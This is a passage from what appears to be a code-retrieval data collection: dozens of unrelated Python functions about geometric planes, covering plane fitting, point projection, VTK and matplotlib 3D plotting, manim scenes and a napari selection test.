[Z[0], Z[1], Z[5], Z[4]],\n [Z[2], Z[3], Z[7], Z[6]],\n [Z[1], Z[2], Z[6], Z[5]],\n [Z[4], Z[7], Z[3], Z[0]],\n [Z[2], Z[3], Z[7], Z[6]]]\n\n # plotting sides\n axis.add_collection3d(\n Poly3DCollection(verts,\n facecolors=(0, 1, 1, 0.25),\n linewidths=1,\n edgecolors='darkblue')\n )\n\n verts = np.array([[[0, 0, 0],\n [0, 0, 1],\n [0, 1, 1],\n [0, 1, 0]]])\n verts = verts * shape\n verts += [plane, 0, 0]\n\n axis.add_collection3d(\n Poly3DCollection(verts,\n facecolors='magenta',\n linewidths=1,\n edgecolors='black')\n )\n\n axis.set_xlabel('plane')\n axis.set_ylabel('col')\n axis.set_zlabel('row')\n\n # auto-scale plot axes\n scaling = np.array([getattr(axis, 'get_{}lim'.format(dim))() for dim in 'xyz'])\n axis.auto_scale_xyz(*[[np.min(scaling), np.max(scaling)]] * 3)\n\n return None", "def test_selecting_points(self, data, selected_data, other_selected_data):\n assume(\n np.max(selected_data) < data.shape[0]\n and np.max(other_selected_data) < data.shape[0]\n )\n\n selected_data = set(selected_data)\n other_selected_data = set(other_selected_data)\n\n layer = Points(data)\n layer.mode = \"select\"\n layer.selected_data = selected_data\n assert layer.selected_data == selected_data\n\n # test switching to 3D\n layer._slice_dims(ndisplay=3)\n assert layer.selected_data == selected_data\n\n # select different points while in 3D mode\n layer.selected_data = other_selected_data\n assert layer.selected_data == other_selected_data\n\n # selection should persist when going back to 2D mode\n layer._slice_dims(ndisplay=2)\n assert layer.selected_data == other_selected_data\n\n # selection should persist when switching between between select and pan_zoom\n layer.mode = \"pan_zoom\"\n assert layer.selected_data == other_selected_data\n layer.mode = \"select\"\n assert layer.selected_data == other_selected_data\n\n # add mode should clear the selection\n layer.mode = \"add\"\n assert layer.selected_data == set()", "def fadePlane(self):\n global circle_group\n circle_group = VGroup()\n\n self.play(FadeOut(number_plane_1))\n\n circle_group.add(circ_main, dot_circ, line_circ, dot_center,\n graph_upper, graph_lower,\n radius_horiz, radius_horiz_end_dot, radius_ang, radius_ang_end_dot,\n central_angle, central_angle_label,\n small_tangent, small_tangent_end_dot ,\n dot_circ_copy, dropped_dot, dropped_perp, radius_horiz_ext,\n ptA, ptB, ptC, ptD, ptE)\n \n # self.play(circle_group.animate.shift(LEFT*5))", "def GetPlaneMode(self, *args):\n return _ShapeUpgrade.ShapeUpgrade_ConvertSurfaceToBezierBasis_GetPlaneMode(self, *args)", "def plot_plane(unit_normal, x_array, y_array, fore):\n # print'unit normal = ', unit_normal\n z = (((unit_normal[0] * (fore[0] - x_array)) + (unit_normal[1] * (fore[1] - y_array))) / unit_normal[2]) + fore[2]\n # print 'plane numbers\\n', z\n return z", "def get_plane_of_points(\n self,\n normal_vector=\"z\",\n planar_coordinate=None,\n ):\n # Get results vectors\n if (normal_vector == \"z\"):\n x_flat = self.floris.grid.x_sorted_inertial_frame[0, 0].flatten()\n y_flat = self.floris.grid.y_sorted_inertial_frame[0, 0].flatten()\n z_flat = self.floris.grid.z_sorted_inertial_frame[0, 0].flatten()\n else:\n x_flat = self.floris.grid.x_sorted[0, 0].flatten()\n y_flat = self.floris.grid.y_sorted[0, 0].flatten()\n z_flat = self.floris.grid.z_sorted[0, 0].flatten()\n u_flat = self.floris.flow_field.u_sorted[0, 0].flatten()\n v_flat = self.floris.flow_field.v_sorted[0, 0].flatten()\n w_flat = self.floris.flow_field.w_sorted[0, 0].flatten()\n\n # Create a df of these\n if normal_vector == 
\"z\":\n df = pd.DataFrame(\n {\n \"x1\": x_flat,\n \"x2\": y_flat,\n \"x3\": z_flat,\n \"u\": u_flat,\n \"v\": v_flat,\n \"w\": w_flat,\n }\n )\n if normal_vector == \"x\":\n df = pd.DataFrame(\n {\n \"x1\": y_flat,\n \"x2\": z_flat,\n \"x3\": x_flat,\n \"u\": u_flat,\n \"v\": v_flat,\n \"w\": w_flat,\n }\n )\n if normal_vector == \"y\":\n df = pd.DataFrame(\n {\n \"x1\": x_flat,\n \"x2\": z_flat,\n \"x3\": y_flat,\n \"u\": u_flat,\n \"v\": v_flat,\n \"w\": w_flat,\n }\n )\n\n # Subset to plane\n # TODO: Seems sloppy as need more than one plane in the z-direction for GCH\n if planar_coordinate is not None:\n df = df[np.isclose(df.x3, planar_coordinate)] # , atol=0.1, rtol=0.0)]\n\n # Drop duplicates\n # TODO is this still needed now that we setup a grid for just this plane?\n df = df.drop_duplicates()\n\n # Sort values of df to make sure plotting is acceptable\n df = df.sort_values([\"x2\", \"x1\"]).reset_index(drop=True)\n\n return df", "def plane_distance(p, plane):\n x, y, z = p\n A, B, C, D = plane\n return A*x + B*y + C*z + D", "def __init__(self, obj, plane):\n self.obj = obj\n self.plane = plane\n self.plane_origin = plane[0]\n self.plane_normal = plane[1]\n self.distance_from_plane = np.dot((self.obj.vectors-self.plane[0]),\n self.plane[1])\n self.slice_points = []\n\n self.calculate_points()\n \n return None", "def topo_plane_paramEval(self, param):\n # Create an empty numpy array with the same number as pixels as the real data.\n self.topo_plane_fit_data = np.zeros((self.y_res, self.x_res))\n for y in range(0, self.y_res): # Iterate over the y-axis pixels.\n for x in range(0, self.x_res): # Iterate over the x-axis pixels.\n self.topo_plane_fit_data[y, x] = param[0]*x + param[1]*y + param[2] # Generate plane value.\n return self.topo_plane_fit_data # Return entire array.", "def invert_point_on_plane(point, plane):\n _, _, proj = project_point_to_plane(point, plane)\n\n u, v = proj[0][1]\n return u, v", "def plane_list(self):\n return self.__plane_list", "def test_point_on_plane(self, point, plane):\n _dist = point.dot(plane[:3]) + plane[3]\n if _dist <= epsilon:\n print('OK => point on plane')\n else:\n print('NO => point not on plane')", "def LinePlane(line):\n line = rhutil.coerceline(line, True)\n rc, plane = line.TryGetPlane()\n if not rc: return scriptcontext.errorhandler()\n return plane", "def closest_point_on_plane(point, plane):\n base, normal = plane\n x, y, z = base\n a, b, c = normalize_vector(normal)\n x1, y1, z1 = point\n d = a * x + b * y + c * z\n k = (a * x1 + b * y1 + c * z1 - d) / (a**2 + b**2 + c**2)\n return [x1 - k * a,\n y1 - k * b,\n z1 - k * c]", "def _constructClippingPlane( self, viewProj, positive, axis):\r\n if positive: scale = 1\r\n else: scale = -1\r\n\r\n return Plane(viewProj[0,3] + scale*viewProj[0, axis],\r\n viewProj[1,3] + scale*viewProj[1, axis],\r\n viewProj[2,3] + scale*viewProj[2, axis],\r\n viewProj[3,3] + scale*viewProj[3, axis] )", "def planes_3d(self, quantity, xplane, yplane):\n xplane = int(xplane)\n yplane = int(yplane)\n # Get the scalar values\n # Get the data on the plane with a fixed x value. These means we'll\n # have changing (y, z) points\n xdata = self.get_plane(quantity, 'yz', xplane)\n # z first cuz we want y to be changing before z to correspond with the\n # way numpy flattens arrays. 
Note this means y points will be in the\n # 2nd column\n xplanepoints = np.array(list(itertools.product(self.Z, self.Y)))\n xdata = xdata.flatten()\n xplanexval = np.array(list(itertools.repeat(x[xplane], len(xdata))))\n xplanedata = np.zeros((xplanepoints.shape[0], 4))\n xplanedata[:, 0] = xplanexval\n xplanedata[:, 1] = xplanepoints[:, 1]\n xplanedata[:, 2] = xplanepoints[:, 0]\n xplanedata[:, 3] = xdata\n # Same procedure for fixed y plane\n ydata = self.get_plane(quantity, 'xz', yplane)\n yplanepoints = np.array(list(itertools.product(z, x)))\n ydata = ydata.flatten()\n yplaneyval = np.array(list(itertools.repeat(y[yplane], len(ydata))))\n yplanedata = np.zeros((yplanepoints.shape[0], 4))\n yplanedata[:, 0] = yplanepoints[:, 1]\n yplanedata[:, 1] = yplaneyval\n yplanedata[:, 2] = yplanepoints[:, 0]\n yplanedata[:, 3] = ydata\n labels = ('X [um]', 'Y [um]', 'Z [um]', quantity)\n # Now stack them vertically and plot!\n all_data = np.vstack((xplanedata, yplanedata))\n self.scatter3d(all_data[:, 0], all_data[:, 1], all_data[:, 2],\n all_data[:, 3], labels, 'planes_3d')", "def plane_indexes_from(self, plane_index: int):\r\n if plane_index is None:\r\n return range(len(self.fit.tracer.planes))\r\n return [plane_index]", "def PlotAntsPlane():\n\n # load and shrink airplane\n airplane = vtkInterface.PolyData(planefile)\n airplane.points /= 10\n # pts = airplane.GetNumpyPoints() # gets pointer to array\n # pts /= 10 # shrink\n\n # rotate and translate ant so it is on the plane\n ant = vtkInterface.PolyData(antfile)\n ant.RotateX(90)\n ant.Translate([90, 60, 15])\n\n # Make a copy and add another ant\n ant_copy = ant.Copy()\n ant_copy.Translate([30, 0, -10])\n\n # Create plotting object\n plobj = vtkInterface.PlotClass()\n plobj.AddMesh(ant, 'r')\n plobj.AddMesh(ant_copy, 'b')\n\n # Add airplane mesh and make the color equal to the Y position\n plane_scalars = airplane.points[:, 1]\n plobj.AddMesh(airplane, scalars=plane_scalars, stitle='Plane Y\\nLocation')\n plobj.AddText('Ants and Plane Example')\n plobj.Plot()", "def mirror_point_to_plane(point, plane):\n assert isinstance(plane, cg3d_plane.CGPlane)\n pn, norm = plane.get_point_and_normal()\n norm.normalize()\n return point - 2.0 * ((point - pn) * norm) * norm", "def project_points_plane(points, plane):\n return [project_point_plane(point, plane) for point in points]", "def _getDockColor(self, plane):\n color = (0,0,0)\n if plane.zAxis != -1:\n color = self.globalAxis[plane.zAxis].color[0:3]\n return color", "def __getPlaneName(self):\n item = self._item()\n planeNormal = item.getNormal() if item is not None else None\n\n for name, normal in self._PLANES.items():\n if numpy.array_equal(planeNormal, normal):\n return name\n return '-'", "def get_data_on_horizontal_plane(self, varname, record, plane_number):\n if self.get_mesh_dimension() != 3:\n raise TelemacException(\"Action possible only on 3d mesh\")\n\n values = self.get_data_value(varname, record)\n if plane_number < 0 or plane_number >= self.nplan:\n raise TelemacException(\\\n 'Wrong plane number {} should be in [0, {}]'\\\n .format(plane_number, self.nplan-1))\n start = plane_number*self.npoin2\n end = (plane_number+1)*self.npoin2\n extracted_values = values[start:end]\n\n return extracted_values", "def create_plane(self):\n\n # First we calculate our point increment for both the x and y values\n inc_x = (self.xmax - self.xmin)/(self.xlen - 1)\n inc_y = (self.ymax - self.ymin)/(self.ylen - 1)\n\n # This for-loop will add every x-value with every y-value, saving the values column 
wise\n # i.e. (-10,-10), (-10,-9), (-10.-8),...,(-10,n) for n = our y-values.\n # store these combinations into a list, and add that to our plane. \n # The nested loop will then traverse again and will get the combinations for the next x-value.\n # The loop will continue until all x-values and y-value combinations are added to our plane.\n for y in range(0, self.ylen + 1):\n temp_list = []\n for x in range(0, self.xlen + 1):\n temp_list.append(self.f((self.xmin + x*inc_x) + (self.ymin + y*inc_y)*1j))\n self.plane.append(temp_list)", "def test_CoordinatePlane(self):\n origin = np.random.randn(3)\n normal = np.random.randn(3)\n up_vector = np.random.randn(3)\n plane = shapes_nd.Plane(origin, normal)\n cplane = shapes_3d.CoordinatePlane(origin, normal, up_vector)\n \n np.testing.assert_almost_equal(cplane.dim, plane.dim)\n np.testing.assert_almost_equal(cplane.origin, plane.origin)\n np.testing.assert_almost_equal(cplane.normal, plane.normal)\n \n p3 = [0, 1, 0]\n c, d = cplane.project_point(p3, ret_dist=True)\n np.testing.assert_almost_equal(p3, cplane.revert_projection(c, d))\n p3 = np.random.randn(5, 3)\n c, d = cplane.project_point(p3, ret_dist=True)\n np.testing.assert_almost_equal(p3, cplane.revert_projection(c, d))", "def planeIndex(plane, center = False):\n return (planeBase(center = center) * np.array(plane)).sum()", "def __init__(self,functions):\n Plane.__init__(self)\n self.functions=functions\n self.colors=([RED,BLUE,GREEN,YELLOW]+[window.randomColor() for i in range(len(functions)-4)])[:len(functions)]", "def compare_plane_data(pd1, pd2):\n raise NotImplementedError", "def include_cut_poly_array(self, planes, fix_pts):\n planeActors = []\n\n for i in range(3):\n # get plane coefficients\n a = planes[i][0]\n b = planes[i][1]\n c = planes[i][2]\n\n # create vtk plane object\n VTKplane = vtk.vtkPlane()\n VTKplane.SetNormal(a, b, c)\n if fix_pts[0] == 'var': # for variability test\n VTKplane.SetOrigin(self.epi_apex_node)\n else: # for foreshortening test\n VTKplane.SetOrigin(fix_pts[1+i])\n\n # create cutter\n cutEdges = vtk.vtkCutter()\n cutEdges.SetInputData(self.endo_poly) # always cut through endo\n cutEdges.SetCutFunction(VTKplane)\n cutEdges.GenerateCutScalarsOn()\n cutEdges.GenerateTrianglesOn()\n cutEdges.SetValue(0, 0.5)\n\n # create strips # just for output purposes\n cutStrips = vtk.vtkStripper()\n cutStrips.SetInputConnection(cutEdges.GetOutputPort())\n cutStrips.Update()\n\n # get polydata from strips (just for output purposes)\n cutPoly = vtk.vtkPolyData()\n cutPts = cutStrips.GetOutput().GetPoints()\n cutPoly.SetPoints(cutPts)\n cutPoly.SetPolys(cutStrips.GetOutput().GetLines())\n\n cutterMapper = vtk.vtkPolyDataMapper()\n cutterMapper.SetInputConnection(cutEdges.GetOutputPort())\n cutterMapper.ScalarVisibilityOff()\n\n # create plane actor\n planeActor = vtk.vtkActor()\n planeActor.SetMapper(cutterMapper)\n planeActor.GetProperty().SetColor(self.plane_colors[i])\n planeActor.GetProperty().SetLineWidth(6)\n\n # store the actors of the specific planes to add later into 1 renderer\n planeActors.append(planeActor)\n\n return planeActors", "def plane_fit(points):\n points = np.reshape(points, (np.shape(points)[0], -1)) # Collapse trialing dimensions\n assert points.shape[0] <= points.shape[1], \"There are only {} points in {} dimensions.\".format(points.shape[1],\n points.shape[0])\n ctr = points.mean(axis=1)\n x = points - ctr[:, np.newaxis]\n M = np.dot(x, x.T) # Could also use np.cov(x) here.\n return ctr, svd(M)[0][:, -1]", "def __init__(self, graphics, plane):\n # 
screen / plane\n self.graphics = graphics\n\n self.view = [graphics.screen_width, graphics.screen_height]\n self.plane = list(plane)\n self.recalculate()\n # camera\n self.anchor = None\n self.pan = False # smooth scroll\n self.find_time = 0.5 # seconds\n self.pan_speed = 50.0 # pos/sec\n self.last_time = time.time()", "def WritePlane(self):\n if not self.__train:\n print('ERROR: Must use Train before WritePlane')\n sys.exit(-1)\n if not self.__openPlaneO:\n print('ERROR: Must use OpenPlaneO before WritePlane')\n sys.exit(-1)\n\n # Defines angular dimensions\n self.__nc_RSoft_O.createDimension('type', self.__n_type)\n\n # Defines variables\n if self.__containsRadial:\n rad_plane_id = self.__nc_RSoft_O.createVariable(\\\n 'radial_plane', 'f4', \\\n ('type','radial_structure_functions'))\n rad_plane_id[:] = self.radial_plane\n if self.__containsAngular:\n ang_plane_id = self.__nc_RSoft_O.createVariable(\\\n 'angular_plane', 'f4', \\\n ('type','angular_structure_functions'))\n ang_plane_id[:] = self.angular_plane\n intercept_id_O = self.__nc_RSoft_O.createVariable(\\\n 'intercept', 'f4', ('type'))\n intercept_id_O[:] = self.intercept", "def project_onto_plane(vect):\n x, y, z = vect\n \n return (x, y, 0.)", "def intersect_plane(L, plane):\n \n # Line U, V\n # Plane N n\n # (VxN-nU:U.N)\n # Note that this is in homogeneous coordinates.\n # intersection of plane (n,p) with the line (v,p)\n # returns point and line parameter\n \n \n den = np.dot(L.w, plane.n)\n \n if abs(den) > (100*_eps):\n P = -(np.cross(L.v, plane.n) + plane.p * L.w) / den\n p = (np.cross(L.v, plane.n) - plane.p * L.w) / den\n \n P = L.pp\n t = np.dot( P-p, N)\n return namedtuple('intersect_plane', 'p t')(P, t)\n else:\n return None", "def addPlaneToScene(self, foot, x, y):\r\n #research\r\n profprint()\r\n scene = slicer.mrmlScene\r\n # Create model node\r\n model = slicer.vtkMRMLModelNode()\r\n model.SetScene(scene)\r\n model.SetName(scene.GenerateUniqueName(\".ObturatorPlane\"))\r\n\r\n planeSource = vtk.vtkPlaneSource()\r\n foot-=25*(x+y)\r\n #planeSource.SetOrigin(np.array(foot))\r\n planeSource.SetOrigin(list(foot))\r\n planeSource.SetPoint1(np.array(foot)+50*x)\r\n planeSource.SetPoint2(np.array(foot)+50*y)\r\n planeSource.Update()\r\n model.SetAndObservePolyData(planeSource.GetOutput())\r\n\r\n # Create display node\r\n modelDisplay = slicer.vtkMRMLModelDisplayNode()\r\n modelDisplay.SetColor(1,1,0) # yellow\r\n modelDisplay.SetBackfaceCulling(0)\r\n modelDisplay.SetScene(scene)\r\n scene.AddNode(modelDisplay)\r\n model.SetAndObserveDisplayNodeID(modelDisplay.GetID())\r\n\r\n # Add to scene\r\n scene.AddNode(model)\r\n # transform = slicer.vtkMRMLLinearTransformNode()\r\n # scene.AddNode(transform)\r\n # model.SetAndObserveTransformNodeID(transform.GetID())\r\n #\r\n # vTransform = vtk.vtkTransform()\r\n # vTransform.Scale(50,50,50)\r\n # #vTransform.RotateX(30)\r\n # transform.SetAndObserveMatrixTransformToParent(vTransform.GetMatrix())\r", "def get_cut_poly_array(self, planes, angles, disp, fix_pts):\n noPlanes = len(planes)\n plane_storer = [] #4, 2, 3ch in this order\n cut_poly_array = [] #4, 2, 3ch in this order\n\n view_type = ['4ch', '2ch', '3ch']\n\n for i in range(noPlanes):\n if fix_pts[0] == 'var': # for variability test\n origin = self.epi_apex_node\n else: # for foreshortening test\n origin = fix_pts[1+i]\n\n cutPoly_endo_epi, planeActor_endo_epi = self.get_edges_strips(planes[i], origin,\n view_type[i], self.plane_colors[i])\n cut_poly_array.append(cutPoly_endo_epi) # 4, 2, 3\n 
plane_storer.append(planeActor_endo_epi)\n\n\n # DISPLAY PURPOSES #\n\n # include apex_node\n apexA = include_points(list(self.epi_apex_node), 1, 15, (0, 0, 0))\n\n ## create legend box ##\n legend = vtk.vtkLegendBoxActor()\n legend.SetNumberOfEntries(3)\n\n legendBox = vtk.vtkCubeSource()\n legendBox.SetXLength(2)\n legendBox.SetYLength(2)\n legend.SetEntry(0, legendBox.GetOutput(), \"4 ch\", (0, 1, 0)) #green\n legend.SetEntry(1, legendBox.GetOutput(), \"2 ch\", (0, 0, 1)) #blue\n\n legend.UseBackgroundOn()\n legend.LockBorderOn()\n legend.SetBackgroundColor(0.5, 0.5, 0.5)\n\n # create text box to display the angles ..\n textActor = vtk.vtkTextActor()\n textActor.SetInput(\"4ch = \" + str(angles[0])\n + \"\\n\" + \"2ch = \" + str(angles[1]))\n textActor.SetPosition2(10, 40)\n textActor.GetTextProperty().SetFontSize(24)\n textActor.GetTextProperty().SetColor(1.0, 0.0, 0.0)\n\n # display x-y-z actor\n axes = get_axes_actor([80,80,80], [0,0,0])\n\n # lets display the rv_dir\n rv_dir_act = include_points(list(60*self.rv_dir), 1, 15, (1, 0 ,1))\n\n ren = vtk.vtkRenderer()\n ren.SetBackground(1.0, 1.0, 1.0)\n ren.AddActor(self.meshActor)\n\n # for plAct in [item for sublist in plane_storer for item in sublist]: # flatten list\n # ren.AddActor(plAct)\n\n ren.AddActor(plane_storer[0][0]) # 4ch endo\n ren.AddActor(plane_storer[0][1]) # 4ch epi\n ren.AddActor(plane_storer[1][0]) # 2ch endo\n ren.AddActor(plane_storer[1][1]) # 2ch epi\n # ren.AddActor(plane_storer[2][0]) # 3ch endo\n # ren.AddActor(plane_storer[2][1]) # 3ch epi\n\n self.meshActor.GetProperty().SetOpacity(1.0)\n ren.AddActor(legend)\n ren.AddActor2D(textActor)\n ren.AddActor(axes)\n ren.AddActor(apexA)\n ren.AddActor(rv_dir_act)\n\n if disp:\n vtk_show(ren)\n\n return cut_poly_array, plane_storer, ren", "def plane(*args, length: float=0.0, name: AnyStr=\"\", position: List[float, float, float]=None,\n rotation: List[float, float, float]=None, size: float=0.0, width: float=0.0,\n **kwargs)->AnyStr:\n pass", "def plane_fit(points):\n import numpy as np\n from numpy.linalg import svd\n\n points = np.reshape(\n points, (np.shape(points)[0], -1)\n ) # Collapse trialing dimensions\n assert (\n points.shape[0] <= points.shape[1]\n ), \"There are only {} points in {} dimensions.\".format(\n points.shape[1], points.shape[0]\n )\n ctr = points.mean(axis=1)\n x = points - ctr[:, np.newaxis]\n M = np.dot(x, x.T) # Could also use np.cov(x) here.\n return ctr, svd(M)[0][:, -1]", "def isInPlane(self, p) -> bool:\n # Testing for zero is done with math.isclose, to avoid rounding/floating point errors.\n # Since we are testing near zero, abs_tol is set to 1e-09\n return math.isclose(\n math.fabs(\n dot(\n self.normal(),\n Vector.connect(p.x, p.y, p.z, self.p0.x, self.p0.y, self.p0.z),\n )\n ),\n 0,\n rel_tol=1e-09,\n abs_tol=1e-09,\n )", "def plane_scale(self, scale):\n cmd = '{}testPlaneScale {}'.format(self.console, scale)\n self.write_command(cmd)", "def get_transformable_plane(self, x_range = None, y_range = None):\n plane_config = dict(self.plane_config)\n shift_val = ORIGIN\n if x_range is not None:\n x_min, x_max = x_range\n plane_config[\"x_radius\"] = x_max - x_min\n shift_val += (x_max+x_min)*RIGHT/2.\n if y_range is not None:\n y_min, y_max = y_range\n plane_config[\"y_radius\"] = y_max - y_min\n shift_val += (y_max+y_min)*UP/2.\n plane = ComplexPlane(**plane_config)\n plane.shift(shift_val)\n if self.use_multicolored_plane:\n self.paint_plane(plane)\n return plane", "def planeFit(points):\n\n points = np.reshape(points, 
(np.shape(points)[0], -1)) # Collapse trialing dimensions\n assert points.shape[0] <= points.shape[1], \"There are only {} points in {} dimensions.\".format(points.shape[1], points.shape[0])\n ctr = points.mean(axis=1)\n x = points - ctr[:,np.newaxis]\n M = np.dot(x, x.T) # Could also use np.cov(x) here.\n\n return ctr, np.linalg.svd(M)[0][:,-1]", "def plane_update(self):\n self.plane.update()", "def bbPlane(selection='(all)', color='gray', transp=0.3, state=-1, name=None, quiet=1):\n from pymol.cgo import BEGIN, TRIANGLES, COLOR, VERTEX, END\n from pymol import cgo\n from chempy import cpv\n\n # format input\n transp = float(transp)\n state, quiet = int(state), int(quiet)\n if name is None:\n name = cmd.get_unused_name(\"backbonePlane\")\n\n if state < 0:\n state = cmd.get_state()\n elif state == 0:\n for state in range(1, cmd.count_states(selection) + 1):\n bbPlane(selection, color, transp, state, name, quiet)\n return\n\n AAs = []\n coords = dict()\n\n # need hydrogens on peptide nitrogen\n cmd.h_add('(%s) and n. N' % selection)\n\n # get the list of residue ids\n for obj in cmd.get_object_list(selection):\n sel = obj + \" and (\" + selection + \")\"\n for a in cmd.get_model(sel + \" and n. CA\", state).atom:\n key = '/%s/%s/%s/%s' % (obj, a.segi, a.chain, a.resi)\n AAs.append(key)\n coords[key] = [a.coord, None, None]\n for a in cmd.get_model(sel + \" and n. O\", state).atom:\n key = '/%s/%s/%s/%s' % (obj, a.segi, a.chain, a.resi)\n if key in coords:\n coords[key][1] = a.coord\n for a in cmd.get_model(sel + \" and ((n. N extend 1 and e. H) or (r. PRO and n. CD))\", state).atom:\n key = '/%s/%s/%s/%s' % (obj, a.segi, a.chain, a.resi)\n if key in coords:\n coords[key][2] = a.coord\n\n # need at least two amino acids\n if len(AAs) <= 1:\n print(\"ERROR: Please provide at least two amino acids, the alpha-carbon on the 2nd is needed.\")\n return\n\n # prepare the cgo\n obj = [\n BEGIN, TRIANGLES,\n ]\n\n for res in range(0, len(AAs) - 1):\n curIdx, nextIdx = str(AAs[res]), str(AAs[res + 1])\n\n # populate the position array\n pos = [coords[curIdx][0], coords[curIdx][1], coords[nextIdx][2], coords[nextIdx][0]]\n\n # if the data are incomplete for any residues, ignore\n if None in pos:\n if not quiet:\n print(' bbPlane: peptide bond %s -> %s incomplete' % (curIdx, nextIdx))\n continue\n\n if cpv.distance(pos[0], pos[3]) > 4.0:\n if not quiet:\n print(' bbPlane: %s and %s not adjacent' % (curIdx, nextIdx))\n continue\n\n normal = cpv.normalize(cpv.cross_product(\n cpv.sub(pos[1], pos[0]),\n cpv.sub(pos[2], pos[0])))\n\n obj.append(cgo.NORMAL)\n obj.extend(normal)\n\n # need to order vertices to generate correct triangles for plane\n if cpv.dot_product(cpv.sub(pos[0], pos[1]), cpv.sub(pos[2], pos[3])) < 0:\n vorder = [0, 1, 2, 2, 3, 0]\n else:\n vorder = [0, 1, 2, 3, 2, 1]\n\n # fill in the vertex data for the triangles;\n for i in vorder:\n obj.append(VERTEX)\n obj.extend(pos[i])\n\n # finish the CGO\n obj.append(END)\n\n # update the UI\n cmd.load_cgo(obj, name, state, zoom=0)\n cmd.set(\"cgo_transparency\", transp, name)\n cmd.color(color, name)", "def xyplane(draw, r, x, shift = np.array([1000, 1000, 0, 0]), scale = 300):\n extent = 2.8\n pln = np.array(\n [\n [x,-extent,0],\n [x,extent,0],\n [x,extent,extent*2],\n [x,-extent,extent*2]\n ]\n )\n pln = np.dot(pln,np.transpose(r))\n pln = pln * scale + shift[:3]\n draw.polygon([(pln[0][0],pln[0][1]),(pln[1][0],pln[1][1]),(pln[2][0],pln[2][1]),(pln[3][0],pln[3][1])], (0,102,255,70))", "def project_plane_to_2d(xyz_arr, img, center, 
dist_thresh):\n\tplane_img = np.zeros(img.size)\n\tplane_img[xyz_arr[:, 2] > dist_thresh + center[2]] = 1\n\n\tplane_img = np.uint8(np.reshape(plane_img, (424, 512)) * 255) # reshape to match depth data and convert to uint8\n\tplane_img = np.uint8(\n\t\t(np.ones((424, 512)) * 255) - plane_img) # invert img so pixel value corresponds to NOT ground plane\n\tret, plane_img = cv2.threshold(plane_img, 0, 255,\n\t\t\t\t\t\t\t\t cv2.THRESH_BINARY) # filter points that are probaly not ground plane\n\tplane_img = cv2.subtract(img, plane_img)\n\treturn plane_img", "def plot_sag_plane(self, P0=None, sag_pl=None):\n if P0 is None: P0 = np.array([0,0,0])\n if sag_pl is None: sag_pl = self.sp\n norm, d = sag_pl[:3], sag_pl[3]\n import matplotlib.pyplot as plt\n from mpl_toolkits.mplot3d import Axes3D\n plt.ion()\n # create x,y\n xypts = 10\n xrng = 300\n yrng = 130\n xrng_mesh = np.linspace(P0[0], P0[0]-xrng, xypts)\n yrng_mesh = np.linspace(P0[1]-yrng/2., P0[1]+yrng, xypts)\n xx, yy = np.meshgrid(xrng_mesh, yrng_mesh)\n # calculate corresponding z\n zz = -1 * (norm[0] * xx + norm[1] * yy + d) / norm[2]\n # plot the surface\n self.fig = plt.figure()\n self.fig_ax = self.fig.add_subplot(111, projection='3d')\n self.fig_ax.plot_wireframe(xx, yy, zz, color='gray')\n #ax.quiver(P0[0], P0[1], norm[0], norm[1])\n self.fig_ax.set_xlabel('X')\n self.fig_ax.set_ylabel('Y')\n self.fig_ax.set_zlabel('Z')\n self.fig_ax.set_zlim(P0[2]-xrng, P0[2]+yrng)\n plt.show()", "def visualize_scan(self):\n fig = plt.figure()\n ax = fig.add_subplot(111, projection='3d')\n ax.scatter(self.p1_points[:, 0], self.p1_points[:, 1], self.p1_points[:, 2], c='r')\n ax.scatter(self.p2_points[:, 0], self.p2_points[:, 1], self.p2_points[:, 2], c='g')\n ax.scatter(self.p3_points[:, 0], self.p3_points[:, 1], self.p3_points[:, 2], c='b')\n ax.scatter(self.p4_points[:, 0], self.p4_points[:, 1], self.p4_points[:, 2])\n\n ax.set_xlabel('x')\n ax.set_ylabel('y')\n ax.set_zlabel('z')\n plt.show()", "def planeFit(points):\n import numpy as np\n from numpy.linalg import svd\n points = np.reshape(points, (np.shape(points)[0], -1)) # Collapse trialing dimensions\n assert points.shape[0] <= points.shape[1], \"There are only {} points in {} dimensions.\".format(points.shape[1], points.shape[0])\n ctr = points.mean(axis=1)\n x = points - ctr[:,np.newaxis]\n M = np.dot(x, x.T) # Could also use np.cov(x) here.\n return ctr, svd(M)[0][:,-1]", "def PCA_vis(select_PCA_features, player_attributes):\n x = player_attributes.loc[:, select_PCA_features].values\n\n # Standardizing the features\n x = StandardScaler().fit_transform(x)\n\n # perform 3 component PCA\n pca = PCA(n_components=3)\n principalComponents = pca.fit_transform(x)\n principalDf = pd.DataFrame(\n data=principalComponents,\n columns=[\n \"principal component 1\",\n \"principal component 2\",\n \"principal component 3\",\n ],\n )\n\n # plot players dataset projection on three principal components\n # %matplotlib notebook\n\n fig = plt.figure(figsize=(8, 8))\n ax = fig.add_subplot(1, 1, 1, projection=\"3d\")\n ax.set_title(\"3 component PCA\", fontsize=30)\n\n # plot first k players' info along principal components\n k = 4000\n ax.scatter(\n principalDf.loc[:k, \"principal component 1\"],\n principalDf.loc[:k, \"principal component 2\"],\n principalDf.loc[:k, \"principal component 3\"],\n s=1,\n )\n\n ax.set_xlabel(\"Principal Component 1\", fontsize=15)\n ax.set_ylabel(\"Principal Component 2\", fontsize=15)\n ax.set_zlabel(\"Principal Component 3\", fontsize=15)\n plt.show()\n\n return 
principalDf", "def vplane(self, fig=None):\n #TODO more general multi-axis layout...\n figsize = (9, 6.5) # good for letter paper\n if fig is None: fig = plt.figure(figsize=figsize)\n else: fig.set_size_inches(*figsize)\n axkw = dict(frameon = True)\n left, width = 0.075, 0.6\n bh = 0.11\n pad = 0.04\n depth_ax = fig.add_axes((left, 6*pad+4.5*bh, width, bh*2), **axkw)\n axkw.update(dict(sharex = depth_ax))\n pitch_ax = fig.add_axes((left, 5*pad+3.5*bh, width, bh), **axkw)\n buoyancy_ax = fig.add_axes((left, 4*pad+2.5*bh, width, bh), **axkw)\n mass_ax = fig.add_axes((left, 3*pad + 1.5*bh, width, bh), **axkw)\n control_surface_ax = fig.add_axes((left, 2*pad + bh/2, width, bh), **axkw)\n control_mode_ax = fig.add_axes((left, pad, width, bh/2), **axkw)\n # TODO adjust scale and coverage for each axes\n # TODO do this again now that middle labels are removed\n\n self.plot_timeseries('depth', '-', axes=depth_ax)\n self.plot_timeseries('platform_pitch_angle', axes=pitch_ax)\n self.plot_timeseries('platform_mass_position', axes=mass_ax)\n self.plot_timeseries('platform_buoyancy_position', axes=buoyancy_ax)\n self.plot_timeseries('platform_elevator_angle', axes=control_surface_ax)\n # TODO Include another panel with VerticalControl mode (iff present)\n\n # TODO only if engineering data is requested...\n ### add to depth axes ###\n depth_science = {\n 'Depth_Keller/depth': 'c-',\n 